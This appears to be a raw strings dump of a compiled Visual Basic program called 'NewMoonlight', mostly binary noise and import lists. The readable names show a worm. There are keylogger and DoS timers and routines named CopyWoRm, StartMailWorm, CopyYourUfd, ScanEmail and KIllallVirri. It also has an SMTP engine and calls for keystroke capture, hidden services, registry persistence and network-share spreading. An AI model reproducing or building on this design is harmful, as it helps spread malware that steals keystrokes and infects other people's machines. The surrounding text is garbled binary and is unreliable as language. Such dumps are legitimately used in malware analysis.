MONETARYCTYPEZ
OLLKnATEA
__GLOBe_HEAP_SELEEDn-`SVCRT/`CnMonTueWedThuFriSat5nFebMarApr
lAugSe
pOctNovDec~TZUv
PX (y8PX
])dn]l
Paggu&Uru
Ar1ntinaHPe_VColombi$
D+Qic; R
outh Afr.^m
Luxe9stagCSwitz
tIaCnd>p
i.s- 5dOra&rU)EnglxfF'"GOn/B?Mgium
Mexo/asq
Tcu{`;Y_-7
kqg'mh#dk & tob
UvakGg<o-,k-'i+
ew-ahggmV*
bte;/ci
ksss-f
i'u?k '?X
D'n^Jmi
.di{gW' s#
v'cIidgr7`fc/r'J['gGb]ivDa>
eMKzqOn/
sk'),1kO
'htsso5q
f'a|fL
k4-y7il/v
jG=irev-`ib+
aT`i7b
ttM[t'sa;0S'mpVV
:/MrrI
'wLOSS#
SING_?OMA%#R60U~28
- abl6m
a hpo.
GN7t.gqTNcGf\;
qao63<std5
rW+CgKcF c
opecU27
cW82<nIc3
Y_lock
AuAm_0xK9!UmH!
\V8</{
uPsV2f'
tup{"MdM[b
sf+VcTC++ R
7H:myd
, Mnk
AH{bp{
t)q15R
ne}ic0v
ny~vfG
vn^NfF>]
~3GetLaA?!Popup&Wi
ageBoxA
C=32.d
cmdM<exe/\
jHNhUKoc memory_*G zip l=t
\~ZDf5gC'y
z`d%Q[o{-b/$
uwmd7X
Orivgh-$^z
v*X~erboseunp#{.t
rqQuietnz9
Q'DOSNJk SF=
XozEnc
rNd^F8
ViA?ffs
s0ptsq
zdB])U[
2919
-leJd:dull&J
t'oF--
cEy[wl
O;6Hdo!
AB6plxk_tupj[p
bi*lMtOn gic`fz
|SeSby3
Lm&Bb#
7>0Axy
sbvh09.]buff
:;,=+"[]<>| /
$At!oYx:\
\\^YfZ
zQtfE6
=u,GwM
->d%%v
vp T(ofXa}
NffmDZ#
Gw#!r+bV
urd,-f
GF-ABF
dbKGyk8&
ypwi)^d[d;U
AmNPce5&!
s.]05O
W--biP
eXGZtGI{%2d
eaph CJDG3%nc'=-f+
@ge,+xx
d$ h2nbx\
9if;b
Rv%F`>O
-daX xgbu mdo
hh8A,[
[a%s:R(
#USqFt!
run,F+ 6eM
o-gV,y
Sx,15,H~!!X:`F?McK
[W]%XQ
e-u--=
02x,.X
k@:!IX=^z
UyZsd@&
%byaA;(
kK~sitb) !=QBj9qla3
_u0x4xN
\x fqg`P,w-HI
Eype(Qm( .WTb
3VHI>X
`85:F
o5fd%n
p?|rQK\
FC,iMz
3~l&$a
65AC6l
Yl/mV lip
4Z,2 Xu<0
F00e=7!
g:YwM4M
x_p40a
ybFIN
>1dSVESWE22-2EUQ4
-MVMEX
c07xDEApALUT
9h2%EN\S
"X`_DN`
W_C<CA
0GTMW+3S$CHE
W 20VV
\EN$4O?COL(8s%
RPER,J
HcSARG
030FECU9J44L
CHL88+sYURY<cZ@ZP/~
GBRC HNCZE.
|NLDHKGNZLa
|PRItSVKdNXKOldH<(TTO
ZHHI.CHS
ap?\T
BYYIJZYST G
\Ho8,mw/(
NPTBp^4+m
`P7<z
FEGYHMYNI|AhYYZXRDU4
\xLy<z
af50`y!O
_j2=Ws1~
<840,ii(
4MsM4Mi5^A
4MxldXL
4MHD<(
GetDriveTypeAM[^Lea
{RelseMuox
Wa=ForSoL[-ObjJ
)CloAH
eLdExch+g(t
2HpF#e
V4R!,l[rcmpi
u1PhNamn7
<To[3O+Loj
u'Curn%SC
vWidUr]`8
-l+e_-uqlm
K#hp0nlen_d+
8(TvIPTSae1n
S[E$-ZGWTewPUkdPi5PVmrDeCA[WrPoimOsh"Bj
fa LCI_D
W/-nB\:pa!A
Addrc
:T7eni
`;@`yL
89K}i#|l0Q1Op
6wvsptf
%.'$M{
;|-7CG
"9\akp
>EM+/@cB}d)O
)]bq)!
-_.1%0g/"5F
\5=[]u
!V}r{4O
XS<1#*BW!
3|CDxA
v0lC 33
iF%HO0[
WN_7=Y[
3h%E1
C& 85<9
R+5>I(
:1+E%G
@.MOD
re4w]O!0
[dZSB>
KERNEL32.DLL
ADVAPI32.dll
USER32.dll
LoadLibraryA
GetProcAddress
OpenProcessToken
wvsprintfA
ZIP32.dll
ZpArchive
ZpGetOptions
ZpInit
ZpSetOptions
ZpVersion
5lJE@.F
:@HAm`A@
0`x9gx9@
5pJE@.F
:@HAp`A@
:cx>zx:@
2eTH@$2@
>e@>@0Ae@A@05@
@@$<x@<@0J`
5lJE@.F
C@HAm`A@
0`x9gx9@
5pJE@.F
:@HAp`A@
:\x>zx:@
C@p<pp<@
5lJE@.F
:@HAc`A@
0`x9gx9@
5pJE@.F
C@HAe`A@
:\x>zx:@
TH@$1@
JJ@.5@
>eHM@0>@
HQ@0:@
TR@$1@
HQ@0:@
A|HO@0M
TQ@$<@
qMzxM@
]Tp]@p@
5lJE@.F
=@HAm`A@
0`x9gx9@
5pJE@.F
C@HAp`A@
:\x>zx:@
<^xAex<@
Fyx:yxF@
__vbaVarSub
__vbaVarTstGt
__vbaStrI2
_CIcos
_adj_fptan
__vbaStrI4
__vbaVarMove
__vbaVarVargNofree
__vbaAryMove
__vbaFreeVar
__vbaStrVarMove
__vbaLenBstr
__vbaPut3
__vbaEnd
__vbaFreeVarList
_adj_fdiv_m64
__vbaPut4
__vbaFreeObjList
_adj_fprem1
__vbaRecAnsiToUni
__vbaVarCmpNe
__vbaStrCat
__vbaLsetFixstr
__vbaRecDestruct
__vbaSetSystemError
__vbaNameFile
__vbaHresultCheckObj
__vbaLenVar
_adj_fdiv_m32
__vbaVarXor
__vbaAryDestruct
__vbaVarIndexLoadRefLock
__vbaVarForInit
__vbaExitProc
__vbaObjSet
__vbaStrLike
__vbaOnError
_adj_fdiv_m16i
__vbaObjSetAddref
_adj_fdivr_m16i
__vbaVarIndexLoad
__vbaStrFixstr
__vbaVargVar
__vbaBoolVarNull
__vbaRefVarAry
_CIsin
__vbaErase
__vbaVarZero
__vbaChkstk
__vbaGosubFree
__vbaFileClose
EVENT_SINK_AddRef
__vbaGet3
__vbaStrCmp
__vbaAryConstruct2
__vbaGet4
__vbaVarTstEq
__vbaPutOwner3
__vbaObjVar
DllFunctionCall
__vbaVarLateMemSt
__vbaVarOr
_adj_fpatan
__vbaFixstrConstruct
__vbaRedim
__vbaRecUniToAnsi
EVENT_SINK_Release
__vbaNew
_CIsqrt
__vbaVarAnd
EVENT_SINK_QueryInterface
__vbaStrUI1
__vbaVarMul
__vbaExceptHandler
__vbaPrintFile
__vbaStrToUnicode
_adj_fprem
_adj_fdivr_m64
__vbaGosub
__vbaFPException
__vbaInStrVar
__vbaUbound
__vbaStrVarVal
__vbaGetOwner3
__vbaVarCat
__vbaI2Var
_CIlog
__vbaFileOpen
__vbaR8Str
__vbaVar2Vec
__vbaInStr
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaFreeStrList
_adj_fdivr_m32
__vbaPowerR8
_adj_fdiv_r
__vbaVarTstNe
__vbaVarSetVar
__vbaI4Var
__vbaVarCmpEq
__vbaAryLock
__vbaLateMemCall
__vbaVarAdd
__vbaStrToAnsi
__vbaVarDup
__vbaVarMod
__vbaFpI4
__vbaVarLateMemCallLd
__vbaVarCopy
__vbaRecDestructAnsi
__vbaVarSetObjAddref
__vbaLateMemCallLd
__vbaR8IntI2
_CIatan
__vbaStrMove
__vbaStrVarCopy
_allmul
_CItan
__vbaUI1Var
__vbaAryUnlock
__vbaVarForNext
_CIexp
__vbaI4ErrVar
__vbaFreeStr
__vbaFreeObj
`.data
R9N&Yk
I7$(CC
!FHlv9
e%:gKhCy
3 dOidogL
G%Hotgai
O,O/imM
#1?aIA$
C70a4>N
KERNEL32ADV
APIiUS5
pLibra[
&Hk~ -
&SVers'
}7)nJK7MThd
n,5-Wh
&lbUhI
a7*nx4
gZV[EWiWhK
,G5\6,*
u1>xlH&[
%Kj;E4[
P+uffm[
`<<<<U
7P+vkm7RoU+J
>uaq<W
y|E<,;m}2
H@Ekm)lQC.)F0!5_CE.A09k
5@6'/n@@F6y5.Ok
>@b5lJn.
_px=fC
9`xnBpv
Yx^X[<9
c4C2p`\p`!Gp
[,+n^([
Z("4[:
rn=&d6
>`T2`M
Af&>\+\k|
H+eT$5ee`>{
00T,8|
:O<9.2
<<>AO7
v>mo77+\$W7:T
4$y&7Kx@0`\
yVHpyCgye\CFxq4/
\@qT<TdA
qqgF<5 Tx:C
)99Q2)L
HsQy95[
2 llll
4`LLOeq&[
1^H1niF=V:<5
5qlw-/MvMN.d
p`$\73'E^MkY<`OO/3=TD
v/Avp[^
X:VEgr:al>Q@L`L`Z
p@+lpeeepeVgEx\
u1T1@qETX$+U2c(9
\1T@tM
e1Tp Xp 2pWWlBp
Wp=p$W%1T$iM
?Ug;<f
6QMM[#^Q~Qa!]6O0/l@
P9q8rphlH0n
`/$l2M6N
+6E+._QbyTTA*$RR@4-.QQ4mb.OO
G]9n0fX&
Q:.O=l(M=AO
ua>7'xy+0xOMK?L.Lp0K
g'@QA
JO7Jz]">o@9
'>ONm@_>y+X/~
_0lzvA
[.VRt;)v
GZ|oH7x
M499;;,y
CGz8Gv<
QJfdv
#em'm^
rQ6$mmm
LdLQ\X
X5:6]T]
/^&1<u+V;
V+nV;WCo1B@ePC`
`>pBZsF$
MmheslFFX
M< 9{0d0<c<y1_T<4cX
T<d\QFF/2}
adj_fptan?4DIku
|[CAry
57div_nm64k
+m1B,J
b"3 5CV
u)ERQ
)@E}`rG?V
rq1Pn{w.0
AEVENT_SIN-K_
DFuna4
I%Ompac,
vqrudseJ
^x-$aoy[`
2-,Dj<
}ZeZ/d$K#%U
FUu?isj
dff,mxw"%
O.mtp^
+@Oad=c
GPGWHU
ddddddddddddd
IIIIIIIIIIIIIId7I
ttttttttj
<<<<<<<T
1111111(o
Id7(1IIIIIIIIIIII
IIIII`
[fPFMlllll
[sTtpk_glllll
[wwwwnhGFlllll
[i>wTTTTTTTTwpNIMlll
[i)<<<<<<<<<<<<<<:nK_l
[i}<<<<<<<<<<<<<<<<<wl
[c*(((((((((((((((((wl
[>6cj0
"' 6Hx
.LjR=W
.Jbjx=l
[[[[[Y
[[[[[[
[[[[[[[
[q~b[Fllll
[c}ha[]dlll
[f}nKB\`lll
[f}ttttttttttnKG[llll
[@SStha[llll
[XwwwwwwwwwwwwwwSSSTTpNJBllll
[SSSSSSSSSSSSSSTTTTTTTTT:kK^l
[<<<<<<<<<<<<<<<<<<<<<<<<<<u9l
[A><<<<<<<<<<<<<<<<<<<<<<<<<<l
[V211111111111111111111111111l
[2(((((((((((((((((((((((((([l
[|%##########################Kl
[*'5[Dj{
"'/5H[DPY
! 6J[[Lj=
! 6J[[DDDDl
-Yjoz{
[[[[[jxzW
[[[[[[[[
[[[[[[[[7
KERNEL32.DLL
MSVBVM60.DLL
LoadLibraryA
GetProcAddress
ExitProcess
MSVBVM60.DLL
__vbaVarSub
__vbaVarTstGt
__vbaStrI2
_CIcos
_adj_fptan
__vbaStrI4
__vbaVarMove
__vbaVarVargNofree
__vbaAryMove
__vbaFreeVar
__vbaStrVarMove
__vbaLenBstr
__vbaPut3
__vbaEnd
__vbaFreeVarList
_adj_fdiv_m64
__vbaPut4
__vbaFreeObjList
_adj_fprem1
__vbaRecAnsiToUni
__vbaVarCmpNe
__vbaStrCat
__vbaLsetFixstr
__vbaRecDestruct
__vbaSetSystemError
__vbaNameFile
__vbaHresultCheckObj
__vbaLenVar
_adj_fdiv_m32
__vbaVarXor
__vbaAryDestruct
__vbaVarIndexLoadRefLock
__vbaVarForInit
__vbaExitProc
__vbaObjSet
__vbaStrLike
__vbaOnError
_adj_fdiv_m16i
__vbaObjSetAddref
_adj_fdivr_m16i
__vbaVarIndexLoad
__vbaStrFixstr
__vbaVargVar
__vbaBoolVarNull
__vbaRefVarAry
_CIsin
__vbaErase
__vbaVarZero
__vbaChkstk
__vbaGosubFree
__vbaFileClose
EVENT_SINK_AddRef
__vbaGet3
__vbaStrCmp
__vbaAryConstruct2
__vbaGet4
__vbaVarTstEq
__vbaPutOwner3
__vbaObjVar
DllFunctionCall
__vbaVarLateMemSt
__vbaVarOr
_adj_fpatan
__vbaFixstrConstruct
__vbaRedim
__vbaRecUniToAnsi
EVENT_SINK_Release
__vbaNew
_CIsqrt
__vbaVarAnd
EVENT_SINK_QueryInterface
__vbaStrUI1
__vbaVarMul
__vbaExceptHandler
__vbaPrintFile
__vbaStrToUnicode
_adj_fprem
_adj_fdivr_m64
__vbaGosub
__vbaFPException
__vbaInStrVar
__vbaUbound
__vbaStrVarVal
__vbaGetOwner3
__vbaVarCat
__vbaI2Var
_CIlog
__vbaFileOpen
__vbaR8Str
__vbaVar2Vec
__vbaInStr
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaFreeStrList
_adj_fdivr_m32
__vbaPowerR8
_adj_fdiv_r
__vbaVarTstNe
__vbaVarSetVar
__vbaI4Var
__vbaVarCmpEq
__vbaAryLock
__vbaLateMemCall
__vbaVarAdd
__vbaStrToAnsi
__vbaVarDup
__vbaVarMod
__vbaFpI4
__vbaVarLateMemCallLd
__vbaVarCopy
__vbaRecDestructAnsi
__vbaVarSetObjAddref
__vbaLateMemCallLd
__vbaR8IntI2
_CIatan
__vbaStrMove
__vbaStrVarCopy
_allmul
_CItan
__vbaUI1Var
__vbaAryUnlock
__vbaVarForNext
_CIexp
__vbaI4ErrVar
__vbaFreeStr
__vbaFreeObj
L!This program cannot be run in DOS mG
.imports
NewMoonlight
FrmMain
ddddddddddddd
IIIIIIIIIIIIIId7I
ttttttttj
<<<<<<<T
1111111(o
Id7(1IIIIIIIIIIII
IIIII`
[fPFMlllll
[sTtpk_glllll
[wwwwnhGFlllll
[i>wTTTTTTTTwpNIMlll
[i)<<<<<<<<<<<<<<:nK_l
[i}<<<<<<<<<<<<<<<<<wl
[c*(((((((((((((((((wl
[>6cj0
"' 6Hx
.LjR=W
.Jbjx=l
[[[[[Y
[[[[[[
[[[[[[[
[q~b[Fllll
[c}ha[]dlll
[f}nKB\`lll
[f}ttttttttttnKG[llll
[@SStha[llll
[XwwwwwwwwwwwwwwSSSTTpNJBllll
[SSSSSSSSSSSSSSTTTTTTTTT:kK^l
[<<<<<<<<<<<<<<<<<<<<<<<<<<u9l
[A><<<<<<<<<<<<<<<<<<<<<<<<<<l
[V211111111111111111111111111l
[2(((((((((((((((((((((((((([l
[|%##########################Kl
[*'5[Dj{
"'/5H[DPY
! 6J[[Lj=
! 6J[[DDDDl
-Yjoz{
[[[[[jxzW
[[[[[[[[
[[[[[[[[7
MS Sans Serif
TxtCaption
TmrKeyLog
TmrTungguconect
TmrDos
Timer3
Timer2
VB5!*
FILE FOLDER
NewMoonlight
6d":hNc
global
Utilities
ScanEmail
FrmMain
basRegistry
modInet
newSmtp
basService
keylog
ModSmtpEngine
Modzip
ModNetwork
ModMoonUpdate
Modmidi
Modhtt
NewMoonlight
shell32.dll
ShellExecuteA
kernel32
GetWindowsDirectoryA
GetSystemDirectoryA
user32.dll
EnumWindows
user32
EnableWindow
GetParent
ShowWindow
GetWindowTextA
GetClassNameA
SendMessageA
FindWindowA
WritePrivateProfileStringA
GetPrivateProfileStringA
+3q"=h
Da~:W~D9
$!*O3f
TmrKeyLog
+3qC:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
Timer2
TxtCaption
Timer3
TmrDos
TmrTungguconect
wininet.dll
InternetCheckConnectionA
GetDriveTypeA
instal
CopyWoRm
setMyRegister
KIllallVirri
CopyYourUfd
StartMailWorm
SelamatkanMsVb
EndTKMnUW
CreateMutex
kirimbo
taroocx
dRopingAnyFiles
shellbi
buatOtomatis
FindFirstFileA
FindNextFileA
FindClose
VBA6.DLL
__vbaAryDestruct
__vbaPut4
__vbaPutOwner3
__vbaFileClose
__vbaGetOwner3
__vbaFileOpen
__vbaRedim
__vbaExitProc
__vbaVarMod
__vbaLenBstr
__vbaOnError
__vbaVarForNext
__vbaVarXor
__vbaI4Var
__vbaLenVar
__vbaVarForInit
__vbaVarMove
__vbaStrVarCopy
__vbaVarVargNofree
__vbaVarTstNe
__vbaR8IntI2
__vbaStrVarVal
__vbaStrLike
__vbaObjSet
__vbaFreeObj
__vbaVarDup
__vbaHresultCheckObj
__vbaNew2
__vbaVarTstEq
__vbaFixstrConstruct
__vbaFreeVar
__vbaFreeStrList
__vbaStrToUnicode
__vbaSetSystemError
__vbaStrI4
__vbaStrCat
__vbaStrToAnsi
__vbaFreeVarList
__vbaVarCat
__vbaStrVarMove
__vbaStrCmp
__vbaUbound
__vbaFreeStr
__vbaStrMove
__vbaStrCopy
advapi32.dll
OpenSCManagerA
CreateServiceA
DeleteService
CloseServiceHandle
WNetOpenEnumA
OpenServiceA
ws2_32.dll
WSAAsyncSelect
listen
accept
icmp.dll
IcmpCreateFile
IcmpCloseHandle
IcmpSendEcho
WSAStartup
gethostbyname
WSACleanup
RtlMoveMemory
wsock32.dll
gethostbyaddr
inet_addr
ioctlsocket
socket
connect
closesocket
InternetOpenUrlA
InternetReadFile
InternetCloseHandle
InternetOpenA
InternetConnectA
__vbaGosubFree
__vbaGosub
__vbaVarIndexLoad
__vbaInStrVar
__vbaRefVarAry
__vbaErase
__vbaVarCopy
__vbaVarZero
moonlight.dll
ZpInit
ZpSetOptions
ZpGetOptions
ZpArchive
__vbaVarTstGt
__vbaVarCmpNe
__vbaVarCmpEq
__vbaVarOr
__vbaBoolVarNull
__vbaVarSub
__vbaVarAdd
__vbaObjVar
__vbaLateMemCall
__vbaVarLateMemCallLd
__vbaVargVar
__vbaLateMemCallLd
__vbaRecAnsiToUni
__vbaVarSetVar
__vbaInStr
__vbaVarSetObjAddref
__vbaLsetFixstr
__vbaStrFixstr
__vbaRecUniToAnsi
shell32
SHGetSpecialFolderLocation
SHGetPathFromIDListA
mpr.dll
WNetEnumResourceA
WNetCloseEnum
lstrlenA
lstrcpyA
WNetAddConnection2A
RegCloseKey
RegCreateKeyA
RegDeleteKeyA
RegDeleteValueA
RegOpenKeyA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
winmm.dll
mciExecute
mciSendStringA
GetAsyncKeyState
GetKeyState
Kernel32.dll
RegisterServiceProcess
__vbaStrI2
__vbaVar2Vec
__vbaAryMove
__vbaPrintFile
__vbaNameFile
__vbaObjSetAddref
__vbaAryUnlock
__vbaVarIndexLoadRefLock
__vbaVarAnd
__vbaEnd
__vbaFreeObjList
__vbaI4ErrVar
__vbaI2Var
__vbaR8Str
__vbaGet4
__vbaPowerR8
__vbaVarMul
__vbaAryConstruct2
__vbaStrUI1
__vbaAryLock
__vbaNew
__vbaVarLateMemSt
__vbaGet3
__vbaFpI4
__vbaRecDestructAnsi
__vbaUI1Var
__vbaRecDestruct
__vbaPut3
buffer
namafile
drive2
]]]]]]xhXH8(
EMPUQRPxhPQPXRP
HP8QRP(PQP
Q(R8PHQXRhPxQERMPUQRj
UPh$a@
EMPUQERMPUQERMPQj
UERMPUQERMPUQERPj
Q(R8PHQXRhPxQERMPUQRj
jXh`a@
URhta@
EMPUQERPj
MUQR~
EMPUQERMPQj
EM3PQuu
4SVWeE
MfE_^d
PSVWeE
E3SPuu
UQREhd@
EEEEEtdD4$
L<DTPD4
R$PUQR
ETRPUQR
T\MPUQR
dtPUQRj
tSVWeE
uuuuuuuU
PMQURPEPMQPUREPPMQURP
EPMQUREPMQj
UREPMQUREPj
USVWeE@
URhpd@
EPMQEE
EPhpd@
MQURofEfEfEj
,SVWeE
UPQERMPQh0C
uuuu|l\L<,
|lhXH8(
,<QLR\PlQ|RMPUQERMPUQRj
|uf|f9U
f;t%X0C
l|QRPQRPQRP
R,P<QLR\PlQ|RMPUQERMPUQRj
}}}}}tdTD4$
MUQERPj
uuuutdTD40
MQR|0ttH
EMPUQERPj
4DQTRdPtQERMPUQERPj
CSVWeE
URhxs@
SVWeEP
}}}}}|lE
j`h`a@
SVWeE`
}}}}}tdTD4$
MUQERPj
SVWeEp
MPQuuu
uuuuuutplhEu@
f;t3xh
ERPEu@
UQREu@
EMPUQR$
MxQERPE v@
hhtElPQpRtPUQRlp
LQ]]]]
plhd`\HT
tPQhd@
hlQpRPj
tQRhd@
tQRhd@
hlPpQRj
tQRhd@
PEPh[@
tRPhd@
DlpRPj
dPh|i@
d#hRlPpQRj
\UQER`PQ3
\`RhPlQpRPj
UQERMPHQhRPfhlQpRPj
t@QRhd@
@tQRhd@
dRh|i@
#hPlQpRPj
\ERMP`QR0
\`PhQlRpPQj
ERMPUQHRhPQRhlRpPQj
6\`QdRhPlQpRPj
=-SVWeE
P\PxQR
QRPQRj
uuuuu|xhXHD@0
PRPUQR
Q R0PQj
PUR0PQ
EEMP QR
MPQ0RP
RhP0QR
Pl|PUQR
Q R0PQj
l|PUQR
f;tgh0QR
0RP VQ
f9toh0QR
f9t9hP0QR
f9t9hR0PQ
Q R0PQj
P Q0RPj
f9t60C
0QRf50C
f;t*U1C
L@DPQj
Q R0PQj
l|RPQRj
fEPMQj
UREPMQ
P`R0P Q
PQPR@P
PPpQ`R
PpR@P0Q
fpPQRPQR
R PPQR`PpQRPQRP
Q0R`P@QPRpPMQUREPMQUR@PpQPR`PQRPQRP QPR0P@Q`RPQRPQ
Q R@Pj7
R0P@QPR`PpQRPQRPQRP
R P0Q@RPP`QpRPQRPQRPQ
P Q0R@PPQ`RpPQRPQRPQR
Q R0P@QPR`PpQRPQRPQRP
R P0Q@RPP`QpREPMQUREPMQURjL
}SVWeEP
fpUREPMQj
5UREPMQj
3UREPMQj
UREPMQURj
]]]]]|l\L<,
TSVWeE
E3PMuuu
MUVRME
MPQUVR
]]]]]|l\L<,
|xtplhd`\XTP
jPh`a@
E]EEPE
jXh`a@
P]PMh`@
MPEPPMh
MPUQERMPUQERMPQj
jhh`a@
Mp4VQPg(P
MPUQRj
MPUQRj
jXh`a@
EUERPuE
|ERMPUQRj
UER3MPQ
R,P<QLR\PlQ|RMPUQERPj
jXh`a@
EEMPQE
UQRPEMPQPUhX@
RPEh`@
UQERMPQj
MPUQRPEhd@
PPMh`@
ERMPUQRj
MPUQERMPUQERMPUQRj
R,P<QLR\PlQ|RMPUQERPj
=SVWeE
}#j|h`a@
}#jPh`a@
}#jXh`a@
MQUREPj
Q0R@PPQ`Rj
@QPR`Pj
@QPR`Pj
Q8Rhta@
Q8Rh @
}#jXh`a@
EPhta@
}#jXh`a@
URhta@
}#jXh`a@
MQhta@
}#jXh`a@
EPhta@
}#jXh`a@
URhta@
}#jXh`a@
MQhta@
PR0P Q
P@Q0R P
fMQUREPMQUREPj
pQtRxP|QUREPj
P0Q@RPPQRPQR
R0PPQ@R`Pj
MQUREPMQUREPj
pQtRxP|QUREPj
pQRPQRPQRP
R P0Q@RPP`QpRPQRPQRPQ
P Q0R@PPQ`Rj
MQURVwEPMQj
UREPMQj
EPMQURj
MQUREPj
UREPMQj
EPMQURj
rUREPMQURj
MQUREPj
pEPMQURj
MQUREPj
UREPMQj
EPMQURj
MQUREPMQj
EPMQURj
3EPMQUREPj
MQUREPj
}SVWeE
EPMQURj
Q4RPMQtR
EPMQUREPMQUREPj
4QDRTPdQtREPMQURj
PREPMQ
EPMQUREPj
$QTR4PDQdREPtQUREPj
$R4PDQTRdPtQUREPMQj
PMQh01C
4QDRTPdQtREPMQURj
PMQh\@
PMQhx@
PMQh`@
REPh`@
QURh`@
EPMQUREPMQj
UREPMQj
EPMQUREPMQj
UREPMQj
EPMQURj
iMQUREPMQUREPMQj
$R4PDQTRdPtQUREPMQj
R$P4QDRTPdQtREPj
fEfMf;
fEfMf;
EPMQUR
$P4QDRTPdQtRPQRPQRPQ
P$Q4RDPTQdRtPMQj
]SVWeE
MQtRdP,Q<REP
EPMQUR
`EPTQXR\P`QURc^M
,P<QUR
SVWeEX
URQ\E}
UREP8=MQURj
xPMQURj
EPMQ;UREPMQj
xREPMQj
PPPTQ3P
PHRLP3P
P@QDRd3P
EPMQUREPMQUREPMQUREPj
,MQURj
MQUREPMQUREPMQUREPMQj
,xREPMQj
EPMQUR
fMQUREPj
}#jXh`a@
MQhta@
UREPMQURj
UR$PMQ
URPQRPMQxQUREPj
}#jXh`a@
MQhta@
UREPMQURj
EPMQUR
dPtQTR
PTPQDR
fTQdRtPMQUREPj
fzRu)E
}#jXh`a@
EPhta@
MQUREPj
EPMQUR
fMQUREPj
BTu E
[MQURj
4PDQTRdPtQUREPMQURj
]]]]]p`PLk
jXh`a@
URhta@
EMPUQERPj
jXh`a@
EPhta@
3Mf9LUQR
PERMPUQERPj
pMPUQERMPUQRj
-}SVWeE
{SVWeE
SVWeEH
EMPQ5M
SVWeEX
jXh`a@
URhta@
EMPUQERPj
MUQERMPUQRj
vSVWeEh
}#j\h}@
}#jXh`a@
MQUREPMQj
tPMQ`W
}#j\h}@
UREPMQUREPj
TSVWeE
MPhls@
EMPQ/UERMPUQERMPQj
UERMPUQERMPQj
\SVWeE
j8h@a@
ERPEP@
j8h@a@
HSVWeE
QPUh`@
MPQPUh
ERMPUQRj
MjXha@
RPEh`@
PUQRPEh
MPUQERPj
MjXha@
PPMh01C
MPQPUh
UQERMPUQRj
MjXha@
PPMh01C
MPQPUh
UQERMPUQRj
MjXha@
MPQPUh
UQERMPUQRj
MPUQERMPQj
-hSVWeE
EPMQURj
EPMQURj
UREPMQj
EPMQURj
,SVWeE0
3MEEEE
MEQRPPVC5p
SVWeE@
MEPUQRu
MfE_^d
|SVWeEP
3Muuuu
uuuuuuuu
EUPQRuuPE
9uu?UME`@
UEPMVQVERP
MUQMERPVUQRE
UMQERPu
UMPQVERP
UQREVP
f;~.OE
EUQERPE
lSVWeE`
3M}}}}}
Mf0QfFEf
UERMPQ
UERMPQj
UERMPQj
SVWeEp
]f]]]]]]]|ldE
j`h`a@
dUERPj
dUERPj
ddERPj
UERMPUQRj
f:u'EP
EMPUQERPj
uuuuxhXH8(
U8RMPQ
EMPUQERPj
hxRMPUQERMPUQRj
MfE_^d
TPLD@<,&
<@PDQRj
-<@PDQRj
MfP_^d
]]]]]]]p
0Mf;0Q
HUEERj
MMMMxMQMQMEEEEQp
EMPUQRj
MUQERPj
hSVWeE
ERPhdl@
UERPhdl@
MfE_^d
MfE_^d
TSVWeE
f3}}}}
MUQERMPQj
~XUWRj
UERMPUQRj
uuuuul
MQft,U
9l~_EURUE
HSVWeE
0RPP@Q
0Q@RPP`QUREPj
pQUREPj
pQUREPj
MQpRpP
MQUREPMQUREPMQUREPMQj
,`REPMQj
pREPMQj
pQUREPj
UREPpQ
`QpR`P
PQRPQRP
P Q0RPP@Q`RpPMQURj
MQUREP
RFEPMQj
PR`PpQUREPj
pQUREP
R<EPMQj
PMQUREPMQURj
QBUREPj
pPMQUR
`PpQUREPj
PMQURj
`PpQUREPj
pPMQUR
pPMQURj
UREPMQUREPMQUREPMQURj
,PQRPQRPQ
P Q0R@PPQ`RpPMQURj
EEEEtd
UQRPjh
lfUMPUQERP
UERMPQj
t|EQUVERP
URPEM+
-SVWeE
PMQ]tE
dSVWeEh
3RhD~@
3RhPg@
3Rh`v@
3Rhls@
3Rhhd@
MPUQRj
UQERPj
SVWeEx
4R6(48
4R8P$Q
Q$R4PDQj
4R8P$Q
Q$R4PDQj
R$P4QDRj
TRXP\Q`RdPhQlRpPtQxR|PQj
Q4R$PDQj
P$Q4RDPj
$Q4RDPj
QREPXQ
PQURXPMQDR0P
TRXP\Q`RdPhQlRpPtQxR|PQj
4DRTPdQtRPQRPQRPQ
P$Q4RDPj
^SVWeE
EPfMQjj
URhls@
fUREPj
MQhls@
f?fME
MQhls@
TSVWeE@
f;t-Uh01C
EMPUQREM
mASVWeE@
EPMQUR
?SVWeE@ @
EPMQUR
]>SVWeE @
MfMfUf;U
UREPMQ
UfUfEf;|
xfMfUf;t
];SVWeE
`PpQUREPMQUREP
`QpREPMQUREPMQj
fMfUf;
`RpPMQUREPMQURj
8SVWeE`!@
PPhP2C
URh(3C
SVWeE@"@
MfE_^d
2SVWeEP"@
}#j$h@
\fMfUf;X
UREPMQj
URtPxQ|REPMQUREPMQj
/UREPMQj
UREPMQj
m.SVWeE"@
EPMQUREP
EfEfMf;M
M,SVWeE
QUREPMQf
fMfUf;
0P@QPR`P
}#j h@
0P@QPR`Pj
PMQRh0{@
PMQh0{@
PEPpQh0{@
pREPh0{@
xQ|REPMQURj
pRh0{@
PMQPRh0{@
PPMQh0{@
pRtPxQ|REPMQURj
PPh0{@
PUR0Ph0{@
0QURh0{@
pPtQxR|PMQUREPj
0Qh0{@
PMQh0{@
PMQRh0{@
PMQh0{@
fUfEf;
P QPR`P@Q
}#j h@
Q R0P@Q`RPPj
0P@QPR`P
}#j h@
0P@QPR`Pj
ppQtRxP|QUREPMQj
P Q0R@PPQ`Rj
pQh0{@
PRh0{@
0Ph0{@
EPh0{@
SVWeE#@
SVWeE#@
M+PUREP
SVWeE8$@
lP\QLR
P8QUR6
EPMQUR
LSVWeE$@
XSVWeE$@
RPPjh
SVWeE$@
EEEExXH8(E
`hXRHP(Q8RMPQ
EEEMPQ
HUQERPP
UERMPUQRj
(8PUQR
xUQERMPUQRj
SVWeE$@
MQUREPj
UREPMQj
EEEE|l\L<,
<MPUQR
P,MPQP
PUQRPMPQP|RP
PlQRP\LPQPj
L\RlP|QERMPUQERMPUQRj
@L\QlR|PUQERMPUQERMPQj
SVWeE %@
L!This program cannot be run in DOS mode.
uT3~#m#
Fm;|EP?L$
(!xm&_<[
W 6V@eKID-v?
<hTWePE$L;
(u$&$}
(!$-[n#
+x@;qt&
YT!99,@xt
|lhAmx`\
,1Td P
BHD dyN<8}@t0,AE
u)| V2
@ty u9
ygXw<'
_hHSHwrLY
$j (vpR
i2Dw+;
lQmQ$$;S
MPRHL{6
